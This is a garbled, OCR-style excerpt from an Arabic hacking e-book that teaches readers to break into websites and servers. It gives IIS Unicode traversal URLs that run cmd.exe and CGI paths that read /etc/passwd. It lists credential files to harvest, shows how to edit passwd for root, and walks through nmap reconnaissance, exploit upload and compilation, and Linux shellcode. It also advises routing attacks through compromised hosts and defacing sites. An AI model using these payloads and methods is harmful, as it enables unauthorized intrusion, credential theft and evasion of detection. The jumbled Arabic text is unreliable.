$ gcc -o sendmail sendmail.c<br />

$ ./sendemail<br />

Usage : sendmail <br />

$ ./sendmail smtp.israel.<strong>com</strong> RedHat-7.3 anonymous anonymous -----><br />

لاحظانكانتهتكتب هنا الموقع الىتبغاه مكانisrael<br />

connecting to host...<br />

connected...<br />

id<br />

uid=0(root) gid=0(root)<br />

لاحظانه طلب ممناالملقمللبرنامج Sendemail وكمان طلب نظامالتشغیل والیوزر والباسورد<br />

وبعد هذهكله البرنامجأعطاناأمتیاز Rootبسببقیام البرنامج بتنفیذ الnofer Exan<br />

ملاحظة لاتضنأنهلمنانا حطیتالبرنامج ‏.‏XXXبدون SENDMAIL ا ى سببأنا حطی تلك هذه<br />

المثال لآنه هناكثغرهفى هذه البرنامج وراحأشرحهالكأن شاءااللهتعالىبسكانبدىتحفظ الأسم هذه<br />

الظاهرانه ن حنا أتوغلنافى الموضو ع زایدة عن اللزوم<br />

س‎٥‎‏:-‏ یاااللهكل هذه علشانثغرهب سبطل تأنا ماأبغا اتعلم؟<br />

ج:-لووووول حبیبالبى هذهالطریقةالمعقده شویةللثغراتفيثغراتثانیة حلوة وسهله جدا جدا<br />

س‎٦‎‏:-أی شهيقو ل یا Conikتر ى هذه الطریقة یبغالها نظامتشغیل وكمانلغه C وPerl؟<br />

ج:-فيتغرا تتستخدم من خلالالمتصفحیعنىانتهتشو ف معلومات الموقع عبرالمتصفحوتوصل الى<br />

مل فالباسوردات من هذهالطریقه<br />

<strong>١</strong>٧٥


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

ومثال على هذه الثغرا تetc PHP - CGI - UNICODE - VB -<br />

س‎٧‎‏:-اوووووة UNICODEأنا سمعت عنهاكثیر نفسىاشو فكی ف شكلها وأعر ف وی ش هى ؟؟؟<br />

ج:-‏ حبیبى UNICODEهى عبارة عنضع ففي نظام IISفي Microsoft مماتساعدفيأختراق<br />

الموقع بكل سهوله عموماالاختراقبهذهالطرق سه ل جدا<br />

مقارنةبالطرق السابقة التىتم ذكرها منقبل وسو فأضعأمثله علىثغرا ت-:‏ UONICODE<br />

/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%<br />

35%63../winnt/system32/cmd.exe?/c+dir+c:\<br />

/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe<br />

?/c+dir+c:\<br />

/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32<br />

/cmd.exe?/c+dir+c:\<br />

/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/syste<br />

m32/cmd.exe?/c+dir+c:\<br />

/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\<br />

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+di<br />

r+c:\<br />

/cgibin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd<br />

.exe?/c+dir+c:\<br />

حاولتقد المستطا عانىأشكلفىأنوا عUONICODE<br />

أمابالنسبةالىثغرات ال CGI هذه مثال علیها<br />

/ cgi-bin/view-source?../../../../../../../etc/passwd<br />

/cgi-bin/phf<br />

/cgi-bin/wwwboard.pl<br />

/cgi-bin/AT-admin.cgi<br />

<strong>١</strong>٧٦


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

/cgi-bin/info2www<br />

/cgi-bin/environ.cgi<br />

هذه وباقىالعدید من الثغراتیعنى لا یقتصر الأمر على هذهالثغرات وراح أقسمالثغرا تلكب حسب نظام<br />

التشغیل<br />

NT : Uni code , bofferoverfollow , tftp<br />

Liunx : Get Access , CGI , buffer overfollow , PHP , send mail ,<br />

ProFTPD, WU-FTPD, Kernel Exploits, rootkits,<br />

UNIX : Get Access , CGI , buffer overfollow , PHP , send mail , Kernel<br />

...exploits, rootkits, ProFTPD, WU-FTPD,<br />

<strong>١</strong>٧٧


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

‏"استغلال لینكس في اختراق المواقع<br />

"<br />

$$$$$$$$$$$$$$<br />

الكاتب 2001: Viagra<br />

$$$$$$$$$$$$$$<br />

هذا الموضو ع مخص صلمنأراد التعامل معلینكسفياختراق المواقع ولیسلدیه الخبرة الكافیةفیه ...<br />

سو ف یكون هذا الموضو ع عن العملیات التيیست حسن القیامبها بعد ال حصول علىكلمة السر والنجاحفي<br />

الدخول على النظام ..<br />

أولایجب انتعر ف بأنهیمكن انتدخل على بع ض الانظمةباستخدام بع ض الكلمات المشهورة وتوجد بع ض<br />

الانظمةتسمحلك بتنفیذأمر واحدثمتقومباخراجك من النظام بعد ذلك وأفضلتلك الأوامرهي .:<br />

who<br />

rwho<br />

finger<br />

وتستفید من هذه الأوامر بأنكتستعر ضاسماء المستخدمینللنظام وبذلكیمكن انتستخرجكلمة السر من<br />

نفس الاسم وذلكلأن بع ض المستخدمینیستعملكلمة سر مشابهةتقریبالأسمه<br />

مثل .:<br />

username : Black<br />

password : Black2<br />

وفي بع ض الأنظمةتستطیع الدخول بكتابة testأو demo<br />

من الملفات المهمة والتيیجب علیكاستخراجها بعددخولك علىأي<br />

نظام .:<br />

/etc/passwd<br />

/etc/group<br />

/etc/hosts<br />

/usr/adm/sulog<br />

/usr/adm/loginlog<br />

/usr/adm/errlog<br />

/usr/adm/culog<br />

/usr/mail<br />

/usr/lib/cron/crontabs<br />

/etc/shadow<br />

ال حساب .: bin<br />

وهو مهم حی ثیحتوي على حساب المستخدم ویوجدبه معظم الملفات المهمة وقد یوجد<br />

واذاكانكذلكفیمكن<br />

أحیانا ‏(اضافةكلمة سر خاصةبك وتضی ف حسابد خول)‏ روت ‏(لك !!<br />

مل فكلمة السر<br />

(<br />

والطریقةبسهولةكالتالي .:<br />

ed passwd $<br />

وأخیراتقول exec login وتكتبأياسم وبذلكتكون انت مدیر النظام !!<br />

<strong>١</strong>٧٨


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

ما الذي سو فتواجهه عنددخولك علىأي نظام بكلمة سر واسم مستخدم؟ !!<br />

عنددخولك الى النظام ستقابلاحد ى هذه الاحتمالات .:<br />

اما انكاست طعت ال حصول على حساب مدیر النظام)‏ الروت ‏(أو انك حصلت على حساب<br />

في البدایةتكتب الامر التالي .:<br />

مستخدمآخر ..<br />

pwd $<br />

والنتیجةتظهر .:<br />

usr/admin/ $<br />

النتیجة اظهرت انكاستطعت الدخول على المدیر وبذلكتستطیع التعامل معكامل النظامبدونقیود ..<br />

اذاظهرتنتیجة رغی تلك النتیجة ‏..فمثلا :<br />

usr/Black/ $<br />

فهذا یدل على انكدخلت على حساب هذا المستخدم !!<br />

ولعر ض ملفات هذا المستخدمتكتب<br />

الآتي .:<br />

ls /usr/Black $<br />

وسو ف یعر ضلك ملفات هذا المستخدم .:<br />

mail<br />

pers<br />

games<br />

bin<br />

ولكن هذالن یعر ض مل ف .profile<br />

ولكيتستعرضهتكتب الآ<br />

تي .:<br />

cd $<br />

ls -a $<br />

:<br />

:<br />

.profile<br />

$<br />

اذا اردتقراءةمحتویات ملففسو فتكتب الأمر التالي .:<br />

cat letter $<br />

وهذا اذا افترضنا ان المل ف المطلوبهو letter<br />

اذا اردتتغییركلمة السرفما علیك<br />

passwd $<br />

الا انتكتب .:<br />

ثم سیطلب منككلمة السر القدیمة وهي طبعا معك ‏!!وتدخلكلمة السر الجدیدة ..<br />

للب حث عن معلومة معینةتكتب الأمر التالي .:<br />

grep phone Black $<br />

وهذابافترا ض انك طلبت ارقام الهات ف الخاصةبالمستخدم الآخر<br />

ولعمل نسخ من مل ف الى<br />

cp letter letters $<br />

مل فآخرتكتب الآتي .:<br />

<strong>١</strong>٧٩


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

اذا اردت عمل<br />

مع محادثة<br />

مستخدمآخر على اتصال فتكتب الأمر التالي .:<br />

write $<br />

ولمعرفة<br />

who $<br />

من یوجد على النظام نكتب الآتي .:<br />

safadM tty1 april 19 2:30<br />

paul tty2 april 19 2:19<br />

gopher tty3 april 19 2:31<br />

واذا اردتقراءة الملف المحتوي علىكلمات السر المظللةیجب انتكونقددخلت على النظامباستخدام<br />

حساب المدیر نفسه .. ولاستعرا ض مل فكلمات السر<br />

نكتب .:<br />

cat /etc/passwd $<br />

root:F943/sys34:0:1:0000:/:<br />

sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh<br />

checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh<br />

وقدیظهر<br />

حسابآخرللمدیركالتالي .:<br />

Black:chips11,43:34:3:Mr doooom:/usr/Black:<br />

وهذا یعني انهیمكنللمستخدم الاحتفاظ بكلمة السرلمدةثلاثةاسابیعبدونتغییر وانهیجب ان یغیرهاكل<br />

ستة<br />

استعرا ض مل ف المجموعةكالتالي .:<br />

اسابیع ..<br />

ls /etc/group $<br />

root::0:root<br />

adm::2:adm,root<br />

bluebox::70:<br />

ویمكن انیحتوي ملف المجموعة علىكلمات سرأو لایحتوي !!<br />

اذاكان لایحتوي علىكلمة سرفانهیمكن انتصبح انت مدیراللنظامفي<br />

عادي ولیسكمدیرللنظام وذلك بعدة طرق<br />

حالةدخولك بكلمة<br />

سرلمستخدم<br />

.…<br />

<strong>١</strong>٨٠


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

شرح مفصل من الألف إلى الیاء في احتراف<br />

طریق لینكس<br />

"<br />

اختراق المواقع عن<br />

"<br />

$$$$$$$$$$$$<br />

الكاتب:أی س ر<br />

$$$$$$$$$$$$<br />

UNix Usage IN HackinG<br />

اهلا بكم جمیعا<br />

في البدایهاحبانانوهانهناكالعدید منالدروسالجمیله فعلا .. ولكنهاقدیمه ولیست<br />

لذلكاكتبلكم هذاالدرس المطوللكي یكون مكاناللمبتدئین یمكنان یستفیدوا منه<br />

و اتمنى فعلاان یحوز علىاعجابكم<br />

بع ضالمصطلحات الهامه :<br />

كثیر من الناس یحبونان یطلقوا علىكل منال<br />

up to date<br />

pc , servers , super<strong>com</strong>puters و غیرها<br />

(:<br />

-<br />

كلمه BOX<br />

النظام الذي سو ف نقومباختراقه یحتوي عاده علىالعدید منالیوزرز ‏..بالاضافهللیوزرز<br />

تسطیعانتطلق علىالرئیسهناككلمه<br />

و هوالادمیناو المدیر على النظام....‏<br />

بالنسبه لانظمهالتشغیل<br />

طبعا ‏..لا یمكنكانتخترقباستخدام نظامالتشغیل windows ‏..بلتحتاجالىاي نظام مشتق من نظام<br />

التشغیلالیونیكس ..<br />

حسنا ‏..السؤالهولماذا هذهالانظمهبالذات ‏...ولماذا لا یصلحالویندوز؟؟<br />

لسبیبن<br />

الانترنتا غلبه اجهزه شغاله علىالیونیكس سیستمز ‏...و نادرلماتلاقي جهاز شغال علىالویندوز<br />

nt<br />

، و هو یكونsuperuser ... root<br />

..<br />

:<br />

:<br />

-<strong>١</strong><br />

. 9x<br />

اذناقل حاجه حتىتخترق جهازاو سیرفیر شغال علىالیونیكس ‏..یجبانتكون ملمابنظامالتشغیل هذا..‏<br />

لذا منالافضلانكتركبهفي جهازك<br />

معظمادوات واكوادالاكسبلویتات مصممهللعملفيبیئه الیونیكس<br />

..<br />

-٢ طبعا ..<br />

...<br />

اوكي ماهيتوزیعاتالیونیكس ؟؟واللینكس ؟؟<br />

بالنسبهللیونیكس ‏..فهو منقسماليقسمین<br />

<strong>١</strong>- یونیك ستجاري غیر مجاني<br />

٢- یونیكس مفتوحالمصدر و مجاني open source<br />

.. لذافیمكنكتجاهلهالان (:<br />

:<br />

(<br />

).<br />

بالنسبهللیونیكسالتجاري لا یمكنانتركبه على جهازكالعادي<br />

اما المجانيفیوجد منه عده عائلات<br />

BSD-<br />

و هيالاقدم والاصعبفيالاستعمال .. و منالافضللكالاتستعملهاالااذاكنتترغ بفيتركیب سیرفیر<br />

على الجهاز<br />

...<br />

یوجداللینكس ‏..وهو طبعا غني عنالتعری ف<br />

<strong>١</strong>٨<strong>١</strong>


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

(<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

..<br />

طبعا .. یوجد منهالعدید من التوزیعات وانكانافضلها هي SuSe ‏(لماجربها ولكناسمعالكثیر من<br />

الناس یشكرونفي هذه التوزیعه<br />

امابالنسبه لاسهلتوزیهفهي MDK وقدوضعت هنا بع ضالدروس الخاصهبالمندریك<br />

یمكنكتحمیلها وقرائتها<br />

انلمتجد مكانات حصل منه علىاللینكس یمكنك مراسلتي علىایمیلي و نحدد مكانا<br />

لتسلیمك نسخه منالماندریك ‎٩‎اوالرید هات‎٧٫٢‎ ‏(ثمنالاسطواناتالبلانك و النسخفقط<br />

علىاي حال ‏..للینكس ممیزاتكثیره امن مجاني ‏..یمكنكتطویرهلیلائمامكانیات جهازك<br />

(<br />

... مستقر ..<br />

..<br />

..<br />

..<br />

‏-الانترنت<br />

ماذا ‏...تریدانتخترق ‏..جمیل جمیل ‏..تریدانتخترق جهازكام ماذا ؟؟<br />

اه..تریدانتختر قاجهزه مبحرهفيالانترنت اذن ‏..دعنا نبحر علىالانترنت<br />

(:<br />

...<br />

انا عار فانك حصلت على الدرس ده منالانترنت ‏..لكن هذاكان عن طریقالویندوز<br />

‏..لكنانتالیومانسان مختل ف...ان تانسانلینكسي ذهفلسفه محترمه<br />

اذن یجبانتبحرالىالانترنت من نظامالیونیكس ‏..لناساسا یجبانتعر فالمودم بتاعك علىاللینكس<br />

حسبالتوزیعهاللي عندك حاولتعر فالمودم .. حتلاقياناللینكسلم یجداي مودم موصلبالجهاز ؟؟<br />

ما هذا .. لا تتعجب<br />

فكلالمودماتالدا خلیه یطلقون علیها<br />

لماذا لانها مصممهاساساللعملتحت نظام التشغیل windows ‏..ارجوك لاتلوماللینكس<br />

بل یجبانتلوم صانعكروتالفاكسالداخلیه هذه<br />

اوكي امابالنسبهللمودم الخارجي externalفهو مودم حقیقي<br />

... یوجد العدید منالمودمز الخارجیه مثل<br />

یجبان تتاكدانالمودم یكون<br />

علىاي حال خلینافي موضوعنا...‏<br />

خلا ص ‏..ادخل علىالانترنت من خلالال isp وذلك من خلال نظاماللیونیكس<br />

..<br />

.. winmodems<br />

internal<br />

..<br />

(:<br />

real or true modems<br />

acorp , u.s. robotics<br />

USB ولیس serial<br />

(:<br />

..<br />

...<br />

:<br />

..<br />

..<br />

..<br />

..<br />

-<strong>١</strong><br />

اهم حاجهقبلالشرو عفيالاختراقهيانتحاولالایتمالایقا عبك وكشف محاولتك لاختراق سیریفیر<br />

معین<br />

و طبعا هنك و سائل عدیدهلذلكلن اتطرقالیها لانهناكالعدید من الشروحالمتمیزهفي مجالالحمایه<br />

وازالهالاثر<br />

الخصهمفي نقطتیناوثلاثه<br />

ایكانتحاولانتسجلفي موقعتحاولاختراقه .. و لا حتىباساميمزوره لان هذاقد یجعلك عرضه<br />

لكش فالايبي الخا صبك<br />

و منثمال ispثم رقم هاتفك و صباحالفل ت<br />

‎٢‎‏-ایاكان تتباهىباختراقاتكابدااما غیرالمهتمینبامورالهاك<br />

احاولالاتخترق دائم من خلال جهازك ‏...لا لا ‏..انتفهمتني غلط م شقصديیعنيتروحلنتكافیه<br />

..<br />

...<br />

.. لكن<br />

-٣<br />

(:<br />

جهازك ‏=====>الجهازالض حیه ... ده م ش مامون<br />

جهازك======>‏ جهاز وسیط======>‏ السیرفیرالض حیه ‏...دهكدهكویساوي<br />

طیبایهالجهازالوسیط ده..‏ ده ممكن یكون مثلا جهاز مخترق منقبلاو شیل اكاونت<br />

.<br />

<strong>١</strong>٨٢


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

طیب ماهوالشیلاكاون ت:هو عباره عن خدمه حیث یمكنك من خلالهاالتحكمفي جهاز من بعید و هذا<br />

الجهاز علیه نظامالیونیكس<br />

طبعا من غیرانتقومباختراق هذا الجهاز ‏..و یوجد العدید ممن یقدمون هذا الحدمه مجانا<br />

٤- حاولان لاتختر قاجهزه خطیره و مهمه مثل .mil. govاو سیرفیرا تاجب علیكقبلان<br />

غیرها من هذاالنمط.‏<br />

٥- هذه النقطهتعتمد على بع ضتقنیاتالفریكینج<br />

edu. و<br />

..<br />

.. لعملاخفاءلرقمتلیفونك عنمزودالخدمهلدیك .<br />

REdirecting<br />

:<br />

‏-فح صالمواقع ومنافذ ال TCP<br />

یجب علیكقبلانتقومبالاخترا قانتعر فكیف یمشيالانترنت ‏..انهیعتمد علىبروتوكول یدعى<br />

TCP\IP<br />

....<br />

... ركزمعایاابوسایدك = D<br />

و بع ض البروتوكولاتالاخرى<br />

طیب<br />

المفرو ضانكل جهاز على الن تبیكونفیهبورتات مفتوحه ‏..هذاالبورتات یمكنكانتقوم من خلالها<br />

بارسالالداتا<br />

من جهاز الى ذلك الجهاز ‏..هذه البورتاتالمفتوحه ‏(المفتوحهفقط ‏)تكون علىاستعدد دائما لتلقي الداتا<br />

من ریموتبوكس<br />

دائما ماترتب طالبورتات المفتوحهبما یسمىبخدمه<br />

و هذا الخدمه service تكون مستضافه من خلال دیمون<br />

اذن ‏..الدیمون هذااذاقام صاحبالموقع بفتحهفيالسیرفیرفانه یقوم بفتح منفذفيالسیرفیر .. لكي یقوم<br />

الدیمون هذا من خلاله بتقدیمالخدمهالملعونه = D<br />

و هذه بع ض الخدمات معالبورتاتالخاصهبهم لكن طبعا هناككثییر<br />


hi_HaCkEr & MaXhAk2000<br />

..<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

...<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

...<br />

ماهيالمنافذ المفتوحهفيالسیرفیر المستهد ف اذنكیفت حصل عىالمعلومات هذه<br />

من خلال ماالscaners port ‏...السكانرز هي عباره عنبرامجتحولان تتصلبالسیرفیر المستهد ف<br />

من خلال جمیع المنا فذ ‏..و ذلكلمعرفهاي البورتاتالمفتوحه<br />

في هذا السیرفیر اشهر هذا السكانرز هيالاداه nmapبواسطه fyodor ول حسن الحظ یوجد نسخه<br />

منها خاصهبالویندوز و ‏..!!ایه ده ‏..؟؟<br />

احنام ش اتفقنا ننسىالویندوز ده خال ص=


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

.'[^' Escape character is<br />

.target.edu FTP server (SunOS 5.6) ready ٢٢٠<br />

quit<br />

.Goodbye ٢٢<strong>١</strong><br />

Connection closed by foreign host<br />

اهاااا<br />

دول دلونا علىمعلوما تقیمهاوياوي<br />

<strong>١</strong>- نظامالتشغیل هناك هو<br />

٢- دیمونالا فتيبي هناك هوالstandard الليبییجي مع نظمالسن sunOS<br />

(:<br />

SunOS 5.6<br />

تعال نجرببورتتانينتصلبیه منالتلنت :<br />

bash-2.03$ telnet target.edu 25<br />

...Trying xx.xx.xx.xx<br />

.Connected to target.edu<br />

.'[^' Escape character is<br />

target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 ٢٢٠<br />

09:18:14 -0<br />

(EDT) ٤٠٠<br />

quit<br />

target.edu closing connection ٢٫٠٫٠ ٢٢<strong>١</strong><br />

.Connection closed by foreign host<br />

ایضااستفدنامعلوما تقیمه هيان دیمون smtp هوال sendmail واناصداره هو ٨٫<strong>١</strong><strong>١</strong>٫٠/<br />

٨٫٩٫٣<br />

جمیل حمیل .. طیبلماذا نحتج الى هذاالمعلومات ؟؟ لانالاكسبلویت والثغرهالموجوده دائماتعتمد على<br />

ال daemonالموجود و على نظامالتشغیل لكنتوجد مشكله وهيان بع ض المكعلوماتقد یمكنان<br />

تكونمزورهاو غیر ص حیحه<br />

ازاي ؟؟؟تابعمعایاكده<br />

..<br />

:<br />

بالاداه nmap<br />

bash-2.03$ nmap -sS target.edu<br />

Starting nmap V. 2.53 by fyodor@insecure.org (<br />

( /www.insecure.org/nmap<br />

:(Interesting ports on target.edu (xx.xx.xx.xx<br />

The 1518 ports scanned but not shown below are in state: closed)<br />

(<br />

Port State Service<br />

tcp open ftp/٢<strong>١</strong><br />

tcp open telnet/٢٣<br />

<strong>١</strong>٨٥


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

tcp open smtp/٢٥<br />

tcp open http/٨٠<br />

tcp open pop3/<strong>١</strong><strong>١</strong>٠<br />

TCP Sequence Prediction: Class=random positive increments<br />

(!Difficulty=937544 (Good luck<br />

Remote operating system guess: Linux 2.1.122 - 2.2.14<br />

Nmap run <strong>com</strong>pleted -- 1 IP address (1 host up) scanned in 34<br />

seconds<br />

!!!!!!<br />

یانهاراسود<br />

نظامالتشغیل الليالادهقامت بتخمینه هولینكس<br />

م شكان sunOS ‏!!!!!!اه یا و لادالكلب = @<br />

بساحنابرده لازمنعر فتوزیعهاللینكسالوجوده .. لكن نقدر نقولانالمعلومات اللي جمعناهاكفایه و<br />

ممكنتمشي<br />

طیب ‏..كدهاحناقمن بعمل سكان علىالموقع ولكن ممكناحدالادمینزلو عر فانانناقمنابفح ص موقعه<br />

‏...اعتقد نه حیكون زعلان منن و حنا م ش عایزینالادمینیزعل مننالذلك<br />

استخدمناالاختیار علىاي حلفان عمل سكانلموقع یعتبر عمل شرعيلا مشاكلفیه =D<br />

|:<br />

Ss-<br />

لمزید منالمعلومات راجع:‏<br />

bash-2.03$ man nmap<br />

رفعادواتك على شلاكونت<br />

‏(هذه الخطوهاذاكن عندك شیلاكاونت و م ش عایزتخترق من جهازك<br />

(<br />

اتبعالتالي :<br />

bash-2.03$ ls<br />

program.c<br />

sh-2.03$ ftp shell.<strong>com</strong><br />

Connected to shell.<strong>com</strong><br />

.shell.<strong>com</strong> FTP server (SunOS 5.6) ready ٢٢٠<br />

Name: luser<br />

.Password required for luser ٣٣<strong>١</strong><br />

:Password<br />

.User luser logged in ٢٣٠<br />

ftp> put program.c<br />

.PORT <strong>com</strong>mand successful ٢٠٠<br />

.(ASCII data connection for program.c (204.42.253.18,57982 <strong>١</strong>٥٠<br />

.Transfer <strong>com</strong>plete ٢٢٦<br />

ftp> quit<br />

Goodbye ٢٢<strong>١</strong><br />

..<br />

<strong>١</strong>٨٦


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

طبعا هذهالطریقه ن خلالاftp<br />

و هي غیر محببه لانهاتقوم بعمل ملفاتاللوجلذلك یفضللكانتقومبنسح سورسكودالاكسبلویت و<br />

لصقهافي مل ففيالشیل<br />

.<br />

sh-2.03$ vi exploit.c<br />

ثمانسخ الكودثمافتح تیرمینالتانيو اتصلبالشیل والصق الكودفي ملف و سمیهبامتداد.‏c<br />

كدهانت رفعتالاكسبلویت بتاعتكللشیلاكاونت<br />

.<br />

وكومبایلللاكسبلویتو بعدیناعملها رن على الهوستالمستهد ف<br />

sh-2.03$ gcc program.c -o program<br />

sh-2.03$ ./program<br />

-:<br />

.<br />

ملحوظه : عیباويانكتاخدالامرین دولكقاعده مسلمبیها..كلاكسبلود ولهاوامرهالخاصهفي<br />

الكومبایل وله طریقهفيالتشغیل<br />

تظهر هذا الطریقهفيالتعلیق البرمجياوفيالusage .<br />

‏-استغلالالثغراتالمختلفه<br />

هذااهمجزافي الموضو ع بمجردانتعر ف ماهو نظامالتشغیل عند الموقع المستهد ف وایضا الدیمونز<br />

الشغاله علىالسیرفیر<br />

فیمكنكانتذهبالىايدتابیزاللي بتقدم اكسبلویت ‏..و دي موجوده بكثره علىالانترنت<br />

http://www.linux.<strong>com</strong>.cn/hack.co.za<br />

مثلا دهفیهكل حاجه ممكن تتخیله .. مقسمهالى دیمونات و نظمتشغیل<br />

ولكن ‏..ماهيالاكسبلویت ؟؟<br />

الاكسبلویت عباره عن سورسكود عاده مكتوبفبلغه السياوالبیرلالمهمان<br />

الاكسبلویت ديتقومباستغلال منطقهمعینهفيالسیرفیر في حاله TARGET.EDU<br />

یمكنناان نستخدمالاكسبلویت الخاصه ب<br />

علىفكرهالعیال دیمااسمعهم یقولواان السند میل هواكبر دیمونمعر ضللاختراق ‏..م ش عار فایه<br />

السند میلاساسا ؟؟<br />

طیب روو حللدرس ده و نتتعر ف<br />

..<br />

sendmail 8.11.0 اواي دیموناخر<br />

:<br />

http://www.pharaonics.net/less/NEtworks/124.htm<br />

..<br />

.<br />

(<br />

....<br />

..<br />

..<br />

فیه حاجه لازمتعرفها انلماتشغلاكسبلویت على سیرفیرمعین ایهالفوائداللي جتعود علیك ‏(غیر طبعا<br />

اختراق الموقع<br />

حت حصل على حاجتین اتنین اول حاجه شیل عادي<br />

تاني حاجه و دهالمهمبالنسبهلنا مایسمىبالرووت شیل<br />

طبعاانتلواخدت رووت شیل علىالسیرفیراذنفانتكدهتمتلككفهالصلاحیات و ممكنتعملكلاللي<br />

انت عایزه ‏..ممكنتستعملالرووت شیل دهكجهاز و سیط زي ماقلتفياول الدرس<br />

دتابیز صغیرهللاكسبلویتات هي<br />

www.securityfocus.<strong>com</strong> :<br />

www.insecure.org/sploits.html<br />

..<br />

.. طیب زي ماقل تانكلاكسبلویت مختلفه عنالاخر ى و یجب علیكانتقراالكود بتاعهااوالتعلیقا تاذا<br />

كنت لاتفهمفيلغهالبرمجه<br />

مناسهل واشهرالاكسبلویتاتهي البفراوفرفلو ... یقوم هذهالاكسبلویت بعمل ) دربكهفي الدیمون<br />

مم یؤديالىتشغیلالكودالذيتریده<br />

(<br />

<strong>١</strong>٨٧


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

یقوم هذا الكود بتشغیل شیلفيالسیرفیرلذلكفهو یسمى شیلكودcode shell<br />

طبعا یختل ف هذاالكودتبعالنظامالتشغیل ‏..لذلك یجب علینااننعر ف نظمالتشغیلالمستخدمفيالسیرفیر<br />

لو شوفناكود اكسبلویتمعینه ممكن نلاقي ده<br />

= []char shellcode<br />

\"<br />

"xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b<br />

\"<br />

"x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd<br />

‏"\‏x80\xe8\xdc\xff\xff\xff/bin/sh؛"‏<br />

اها..دههللینكس و یقوم بتشغیلالشیلالليفيالمسار دهه bin/sh/<br />

طبعالوالسیرفیر بتاعك شغال على نظامتشغیلاخراذن یجب علیكانتغیرالشیلكود<br />

دهالىاخر یناسبالنظامالمستهد ف .. طبعا ممكنتلاقي شیلكودسلجمیع نظمالتشغیلفي مواقع<br />

السیكیورتي المختلفه.‏<br />

...<br />

زي ماقلت یجب علیك الباانك متستعمل ش جهازكفيالاختراق .. وانماتستخدم جهازا وسیطااو شیل<br />

اكاونت ‏..طریقهلدخولالىالشیل اكاونتكالتالي<br />

bash-2.03$ telnet myshellaccount 23<br />

...Trying xx.xx.xx.xx<br />

.Connected to yourshellaccount<br />

.'[^' Escape character is<br />

Wel<strong>com</strong>e to yourshellaccount<br />

login: malicioususer<br />

(Password: (it doesn't display<br />

.


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

یا عیني ‏..كدهانا بقیت رووت =)<br />

طیبفیه العدید منالاكسبلویتت م ش بتخلیك رووت علىالسیستم..وانماتدیكبس شیلهنال<br />

لذلك یجب علیك نتقومبرفع اكسبلةیتاخرلوكل<br />

لل حصول على الرروتفيالنظام...‏ تذكر نتحاولان تتجنب رفعالاكسبلویتاتبالا فتيبي علىقدر<br />

المستطا ع ‏(احنا عایزینك =))<br />

فیه اكسبلویتاتاخر ىتعطیك صلاحیهاظهار مل فالباسورد..ايتي سي =><br />

local<br />

‏-وضعباك دور :-<br />

جمیل ‏..اذنفقداخذنا رووت علىالسیستم ‏..ماذا بعد ؟؟؟فعلاانتفيامكانكانتقوم بتغیرالموقعاو<br />

الصفحهالرئیسیه<br />

كل ما علیكانتب حث عنالاندكسفياي مكاناوباستخدامالامرفایند<br />

لكن هذابصراحه و من غیر زعل ‏..ده شغل اللامرز لان عیباويانكتفرد عضلاتك على موقع<br />

فاغلبالهاكرزبامكانهماختراق هذه الدومینات<br />

ولكنانص حك جدیا بتغییرالصفحهالرئیسیهفي موقع محترم مثل<br />

edu.<br />

..<br />

..<br />

